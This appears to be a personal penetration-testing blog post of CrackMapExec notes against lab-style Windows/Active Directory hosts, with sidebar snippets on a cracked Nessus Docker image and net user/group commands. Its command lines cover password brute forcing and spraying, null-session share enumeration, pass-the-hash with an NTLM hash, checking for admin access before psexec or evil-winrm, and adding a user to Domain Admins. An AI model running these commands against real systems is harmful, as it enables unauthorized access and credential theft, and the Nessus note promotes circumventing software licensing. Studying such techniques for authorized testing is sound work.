Skip to main content

crackmapexec or cme | pass pol

crackmapexec smb 10.6.0.2 -u 'SAccount' -p /usr/share/wordlists/rockyou.txt

This does the same job as hydra but this tool is more faster than hydra. 

you can use crackmapexec or cme interchangeably.

installation of crackmapexec:

https://github.com/byt3bl33d3r/CrackMapExec

sudo python3 -m pip install pipx

sudo pipx ensurepath or pipx ensurepath 

sudo apt-get install python3-venv

pipx install crackmapexec 

once it is installed now type cme -h




you can also enumerate shares using cme - crackmapexec. smbclient will not tell you whether you have read or write access on the share folder or not. crackmapexec will tell you that. smbmap will also tell you that. 

lets see how we can enumerate shares using cme:

cme smb 10.10.10.192

or

cme smb 10.10.10.192 --shares

or

cme smb 10.10.10.192 --shares -u ''  (using two single quote separately)

or

cme smb 10.10.10.192 --shares -u '' -p ''  (using two single quote separately)

or

cme smb 10.10.10.192 --shares -u 'PleaseSub'

or cme smb 10.10.10.192 --shares -u 'PleaseSub' -p ''   (this worked actually, see the above ss) 


 

The above image shows another way to access shares using cme when you have username and password known. when you have special character in your password, put password in between the single or double quotes. 


we can also send hash while using crackmapexec:

cme smb 10.10.10.192 -u svc_backup -H <ntlm hash for example>  (if you dont get any failed message then run the below command as well to see pwned or not. 

cme winrm smb 10.10.10.192 -u svc_backup -H <ntlm hash for example>


to see you able to get a remote shell on a remote box:

if you see pwn3d comes as the result then you can launch evil-winrm

crackmapexec  winrm 10.10.10.192 -u NAccount -p H4cky21



before using psexec use crackmapexec to see pwn3d comes or not in the result. when you see pwn3d then you may assume that you can do psexec

crackmapexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

if pwn3d comes then use psexec to pass this administrator hash to the remote box. 

 

using crackmapexec to check account lockout policy:

crackmapexec smb 10.10.10.161 --pass-pol 

or 

crackmapexec smb 10.10.10.161 --pass-pol -u ' ' -p ' '   

(null authentication works for AD that are upgraded from 2003. latest install does not let you do this) if you see this working put it on your pentest report. latest windows requires credentials.

if we see account lockout threshold is 0 then we can safely brute force.

 

we can also use crackmapexec to brute force smb:

crackmapexec smb 10.10.10.161 -u userlist.out -p pwlist.txt 


 

Avi 

Comments

Popular posts from this blog

Install Nessus from docker

The below two commands you need to run first one by one:  docker run -itd --name=ramisec_nessus -p 8834:8834 ramisec/nessus docker exec -it ramisec_nessus /bin/bash /nessus/update.sh Username: admin And you need to change the password: #Enter the command line of the docker container docker exec -it ramisec_nessus bash #Execute the following commands in sequence # Enter this directory cd /opt/nessus/sbin # List logged in users ./nessuscli lsuser # Modify the password of the specified user (take admin as an example) ./nessuscli chpasswd admin After access to the nessus, make sure you turn off the automatic updates otherwise crack will not work after some time. Before any scan you need to run the update.sh command (shown above) to have the latest plugins. Now everytime your system reboots, your docker instance will be shutdown. You need to up it again manually. Here are the commands.  1. docker ps -a    Now note down the container id. 2. docker start <container id> C

net command cheat sheet

  To see what users present in the system: net user To see local groups in the system: net localgroup To see domain groups. This should be run on a domain controller: net group To see the details of a user along with his/her group membership: net user mahim To see who are the members of a particular group (local machine): net localgroup "administrators"    (These are not case sensitive. You can use administrators or Administrators. Both will give you same result. To see who are the members of a particular group (domain machine): net group "domain admins" Create a local user: net user localuser1 MyP@ssw0rd /add Create a domain user: net user domainuser1 MyP@ssw0rd /add /domain Add the local user to local admin group: net localgroup Administrators localuser1 /add Add the user to domain admin group: net group "Domain Admins" domainuser1 /add /domain Avi